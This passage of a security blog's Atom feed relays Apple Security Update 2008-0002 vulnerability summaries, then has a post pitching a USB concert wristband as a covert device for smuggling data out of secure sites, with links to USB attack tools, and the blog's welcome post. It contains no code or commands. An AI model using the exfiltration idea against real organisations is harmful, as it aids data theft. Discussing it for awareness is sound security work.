Credit to Mike Ash of Rogue Amoeba Software for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;mDNSResponder&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0989&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: A local user may be able to execute arbitrary code with system privileges&lt;br /&gt;&lt;br /&gt;Description: A format string issue exists in mDNSResponderHelper. By setting the local hostname to a maliciously crafted string, a local user could cause a denial of service or arbitrary code execution with the privileges of mDNSResponderHelper. This update addresses the issue by using a static format string. This issue does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;notifyd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0990&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: A local user may be able to deny access to notifications&lt;br /&gt;&lt;br /&gt;Description: notifyd accepts Mach port death notifications without verifying that they come from the kernel. If a local user sends fake Mach port death notifications to notifyd, applications that use the notify(3) API to register for notifications may never receive the notifications. This update addresses the issue by only accepting Mach port death notifications from the kernel. 
This issue does not affect systems running Mac OS X v10.5 or later.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;OpenSSH&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-4752&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: A remote attacker may be able to execute arbitrary code with elevated privileges&lt;br /&gt;&lt;br /&gt;Description: OpenSSH forwards a trusted X11 cookie when it cannot create an untrusted one. This may allow a remote attacker to gain elevated privileges. This update addresses the issue by updating OpenSSH to version 4.7. Further information is available via the OpenSSH website &lt;a href="http://www.openssh.org/txt/release-4.7"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;pax archive utility&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0992&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Running the pax command on a maliciously crafted archive may lead to arbitrary code execution&lt;br /&gt;&lt;br /&gt;Description: The pax command line tool does not check a length in its input before using it as an array index, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by checking the index. 
This issue does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;PHP&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-1659, CVE-2007-1660, CVE-2007-1661, CVE-2007-1662, CVE-2007-4766, CVE-2007-4767, CVE-2007-4768, CVE-2007-4887&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in PHP 5.2.4&lt;br /&gt;&lt;br /&gt;Description: PHP is updated to version 5.2.5 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at &lt;a href="http://www.php.net/"&gt;http://www.php.net/&lt;/a&gt;. PHP version 5.2.x is only provided with Mac OS X v10.5 systems.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;PHP&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-3378, CVE-2007-3799&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in PHP 4.4.7&lt;br /&gt;&lt;br /&gt;Description: PHP is updated to version 4.4.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at &lt;a href="http://www.php.net/"&gt;http://www.php.net/&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Podcast Producer&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0993&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Podcast Capture exposes passwords to other local users&lt;br /&gt;&lt;br /&gt;Description: The Podcast Capture application provides passwords to a subtask through the arguments, potentially exposing the passwords to other local users. This update corrects the issue by providing passwords to the subtask through a pipe. 
This issue does not affect systems prior to Mac OS X v10.5. Credit to Maximilian Reiss of Chair for Applied Software Engineering, TUM for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Preview&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0994&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Saving to encrypted PDF in Preview produces files that may be read without the password&lt;br /&gt;&lt;br /&gt;Description: When Preview saves a PDF file with encryption, it uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Printing&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0995&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Printing to encrypted PDF produces files that may be read without the `open' password&lt;br /&gt;&lt;br /&gt;Description: Printing to a PDF file and setting an 'open' password uses 40-bit RC4. This encryption algorithm may be broken with significant but readily available computing power. A person with access to the file may apply a brute-force technique to view it. This update enhances the encryption to 128-bit RC4. This issue does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Printing&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0996&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Printing to an authenticated print queue may disclose login credentials&lt;br /&gt;&lt;br /&gt;Description: An information disclosure issue exists in the handling of authenticated print queues. 
When starting a job on an authenticated print queue, the credentials used for authentication may be saved to disk. This update addresses the issue by removing user credentials from printing presets before saving them to disk. This issue does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;System Configuration&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0998&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: A local user may be able to execute arbitrary code with system privileges&lt;br /&gt;&lt;br /&gt;Description: The privileged tool NetCfgTool uses distributed objects to communicate with untrusted client programs on the local machine. By sending a maliciously crafted message, a local user can bypass the authorization step and may cause arbitrary code execution with the privileges of the privileged program. This update addresses the issue by performing additional validation of distributed objects.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;UDF&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-0999&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Opening a maliciously crafted disk image may lead to an unexpected system shutdown&lt;br /&gt;&lt;br /&gt;Description: A null pointer dereference issue exists in the handling of Universal Disc Format (UDF) file systems. By enticing a user to open a maliciously crafted disk image, an attacker may cause an unexpected system shutdown. This update addresses the issue through improved validation of UDF file systems. This issue does not affect systems prior to Mac OS X v10.5. 
Credit to Paul Wagland of Redwood Software, and Wayne Linder of Iomega for reporting this issue.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Wiki Server&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2008-1000&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: A user with access to edit wiki content may be able to execute arbitrary commands as the wiki server&lt;br /&gt;&lt;br /&gt;Description: A path traversal issue exists in the Mac OS X v10.5 Server Wiki Server. Attackers with access to edit wiki content may upload files that leverage this issue to place content wherever the wiki server can write, which may lead to arbitrary code execution with the privileges of the wiki server. This update addresses the issue through improved file name handling. This issue does not affect systems prior to Mac OS X v10.5. Credit to Rodrigo Carvalho, from the Core Security Consulting Services (CSC) team of CORE Security Technologies.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;X11&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-4568, CVE-2007-4990&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in X11 X Font Server (XFS) 1.0.4&lt;br /&gt;&lt;br /&gt;Description: Multiple vulnerabilities exist in X11 X Font Server (XFS) 1.0.4, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to version 1.0.5. 
Further information is available via the X.Org website at &lt;a href="http://www.x.org/wiki/Development/Security"&gt;http://www.x.org/wiki/Development/Security&lt;/a&gt;. These issues are already addressed in systems running Mac OS X v10.5.2.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;X11&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2006-3334, CVE-2006-5793, CVE-2007-2445, CVE-2007-5266, CVE-2007-5267, CVE-2007-5268, CVE-2007-5269&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in X11's libpng 1.2.8&lt;br /&gt;&lt;br /&gt;Description: The PNG reference library (libpng) is updated to version 1.2.24 to address several vulnerabilities, the most serious of which may lead to a remote denial of service or arbitrary code execution. Further information is available via the libpng website at &lt;a href="http://www.libpng.org/pub/png/libpng.html"&gt;http://www.libpng.org/pub/png/libpng.html&lt;/a&gt;. This issue affects libpng within X11. It does not affect systems prior to Mac OS X v10.5.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;X11&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;CVE-ID: CVE-2007-5958, CVE-2008-0006, CVE-2007-6427, CVE-2007-6428, CVE-2007-6429&lt;br /&gt;&lt;br /&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2&lt;br /&gt;&lt;br /&gt;Impact: Multiple vulnerabilities in the X11 server&lt;br /&gt;&lt;br /&gt;Description: Numerous vulnerabilities in the X11 server allow execution of arbitrary code with the privileges of the user running the X11 server if the attacker can authenticate to the X11 server. This is a security vulnerability only if the X11 server is configured to not require authentication, which Apple does not recommend. This update fixes the issue by applying the updated X.Org patches. 
Further information is available via the X.Org website at &lt;a href="http://www.x.org/wiki/Development/Security"&gt;http://www.x.org/wiki/Development/Security&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Go update!&lt;br /&gt;&lt;br /&gt;Joel Esler&lt;br /&gt;&lt;a href="http://www.joelesler.net"&gt;http://www.joelesler.net&lt;/a&gt;</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/6959353828666982277/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=6959353828666982277' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/6959353828666982277'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/6959353828666982277'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/03/apple-posts-update-2008-0002.html' title='Apple posts update 2008-0002'/><author><name>Joel Esler</name><uri>http://www.blogger.com/profile/05018134738510159518</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://bp2.blogger.com/_BpBcl5urwoc/SGEd_P7nmEI/AAAAAAAAAKA/EJkaqvwmX0o/S220/Headshot.png'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-9148472805665891376</id><published>2008-03-13T16:20:00.000-07:00</published><updated>2008-03-14T00:01:39.095-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='wristband'/><category scheme='http://www.blogger.com/atom/ns#' term='exfiltration'/><category 
scheme='http://www.blogger.com/atom/ns#' term='matchbox twenty'/><category scheme='http://www.blogger.com/atom/ns#' term='data security'/><category scheme='http://www.blogger.com/atom/ns#' term='usb'/><category scheme='http://www.blogger.com/atom/ns#' term='concert'/><title type='text'>Matchbox Twenty Wristband Turned Pentesting Tool</title><content type='html'>Before I start my new job I've been on vacation in Canada. Maybe it's because I came here straight from Shmoocon, or maybe I'm just a big security geek, but even on holiday I managed to make a fun find.&lt;br /&gt;&lt;br /&gt;My girlfriend is a huge fan of &lt;a href="http://www.matchboxtwenty.com/"&gt;Matchbox Twenty&lt;/a&gt; and as they were playing in Vancouver we went to see them. The barcode scanners weren't working so they ripped the barcode off our ticket to scan it later. If it didn't validate I don't know what they planned to do, but if the ticket tout outside knew this little detail he could have sold a lot more tickets I'm sure. After security failed to search us because we used the small side door they opened temporarily, in we walked, past an exposed ethernet and phone jack I would have loved to have played with. Everywhere I go I notice fun little things like this, J0hnny Long would be proud.&lt;br /&gt;&lt;br /&gt;Anyway, back to my point. As we had the "silver package", after the concert they gave us a special wristband. 
Not just any wristband, a USB wristband containing live recordings of the concert we just walked out of.&lt;br /&gt;&lt;br /&gt;Turns out it's a completely reusable 247MB USB drive (Chipsbnk USB 2.0 rev_5.00), all hidden in a rubber wristband.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_DoxQChaTr8Y/R9m8rJoEq_I/AAAAAAAAABI/ARBCmApsKxE/s1600-h/wristband1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_DoxQChaTr8Y/R9m8rJoEq_I/AAAAAAAAABI/ARBCmApsKxE/s320/wristband1.jpg" alt="" id="BLOGGER_PHOTO_ID_5177376696143490034" border="0" /&gt;&lt;/a&gt;The USB connector doubles as the clip, so when you are wearing it you see nothing but the rubber wristband.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_DoxQChaTr8Y/R9m9BpoErAI/AAAAAAAAABQ/pjs-XMzbUUk/s1600-h/closed-clip.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://2.bp.blogspot.com/_DoxQChaTr8Y/R9m9BpoErAI/AAAAAAAAABQ/pjs-XMzbUUk/s320/closed-clip.jpg" alt="" id="BLOGGER_PHOTO_ID_5177377082690546690" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Hopefully you are seeing where I'm going with this. In you walk to a secure site wearing an innocent wristband. Even if they x-ray or metal detect you, that metal is just the clip for your wristband, right? 
And out you walk with sensitive data around your wrist.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_DoxQChaTr8Y/R9m9aJoErBI/AAAAAAAAABY/hy1B_kWW_48/s1600-h/closed.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_DoxQChaTr8Y/R9m9aJoErBI/AAAAAAAAABY/hy1B_kWW_48/s320/closed.jpg" alt="" id="BLOGGER_PHOTO_ID_5177377503597341714" border="0" /&gt;&lt;/a&gt;&lt;span style="text-decoration: underline;"&gt;&lt;br /&gt;&lt;/span&gt;Granted, it's only a small drive, but I'm sure it could be modified. Imagine for example, if the drive was U3 (if you don't know what mischief U3 can cause check out &lt;a href="http://wiki.hak5.org/wiki/USB_Hacksaw"&gt;http://wiki.hak5.org/wiki/USB_Hacksaw&lt;/a&gt; and &lt;a href="http://wiki.hak5.org/wiki/USB_Switchblade"&gt;http://wiki.hak5.org/wiki/USB_Switchblade&lt;/a&gt;).&lt;br /&gt;&lt;br /&gt;With so many portable and wireless devices, and ever smaller and higher capacity storage devices, you have to be extremely alert to catch how data could be exfiltrated.&lt;br /&gt;&lt;br /&gt;If you want your very own wristband exfiltration device, erm, I mean Matchbox Twenty concert wristband, you can buy them &lt;a href="http://stores.allaccesstoday.com/p-842-usb-wristband-exile-on-mainstream.aspx"&gt;here&lt;/a&gt;. A little pricey as you are buying the music content as well. 
Who would have thought I would find my new favourite pentesting tool at a concert!</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/9148472805665891376/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=9148472805665891376' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/9148472805665891376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/9148472805665891376'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/03/matchbox-twenty-wristband-turned.html' title='Matchbox Twenty Wristband Turned Pentesting Tool'/><author><name>cyber_eagle</name><uri>http://www.blogger.com/profile/14871515833295269631</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='32' src='http://bp3.blogger.com/_DoxQChaTr8Y/R9mpFJoEq3I/AAAAAAAAAAM/JyXhQgb7JU0/S220/matt-aboutme.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_DoxQChaTr8Y/R9m8rJoEq_I/AAAAAAAAABI/ARBCmApsKxE/s72-c/wristband1.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6034918612419541942.post-589464393929104414</id><published>2008-03-11T13:58:00.001-07:00</published><updated>2008-03-12T08:36:05.477-07:00</updated><title type='text'>Welcome To PaulDotCommunity</title><content type='html'>We are very excited to present this blog to the security community.  
There are so many talented people that listen to the show, manage our wiki, participate on our mailing list, and hang out in our IRC channel.  Their voices should be heard, so we created this blog to give them a voice and place to post content.  Just about anyone in our community can post to this blog, all you have to do is send us an email and we will grant you access (we should at least be able to recognize your name, your previous work, have someone vouch for you, etc...).  We would like to see postings with the following content:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Show People How&lt;/span&gt; - We strive to show people how to do things, and believe this blog should too.&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Interesting&lt;/span&gt; - We try not to cover the average, everyday, run-of-the-mill security stories, research, hacking techniques, etc...  This blog should live by the same standards.&lt;/li&gt;&lt;li&gt;&lt;span style="font-weight: bold;"&gt;Relevant and Helpful&lt;/span&gt; - Anything that proves to be useful to others in the community should be posted here, we will most likely discuss all of the posts to this blog on the show!&lt;/li&gt;&lt;/ul&gt;So, we hope to hear from many of you, and happy blogging!&lt;br /&gt;&lt;br /&gt;Cheers,&lt;br /&gt;&lt;br /&gt;PaulDotCom</content><link rel='replies' type='application/atom+xml' href='http://pauldotcommunity.blogspot.com/feeds/589464393929104414/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6034918612419541942&amp;postID=589464393929104414' title='0 Comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/6034918612419541942/posts/default/589464393929104414'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6034918612419541942/posts/default/589464393929104414'/><link rel='alternate' type='text/html' href='http://pauldotcommunity.blogspot.com/2008/03/first-post.html' title='Welcome To PaulDotCommunity'/><author><name>PaulDotCom</name><uri>http://www.blogger.com/profile/05361577336068292461</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='31' height='26' src='http://4.bp.blogspot.com/_RMcDn0JHHhU/SaV2wOlQaqI/AAAAAAAAAB8/qJW0c1cKct8/S220/paulabout.jpg'/></author><thr:total>0</thr:total></entry></feed>
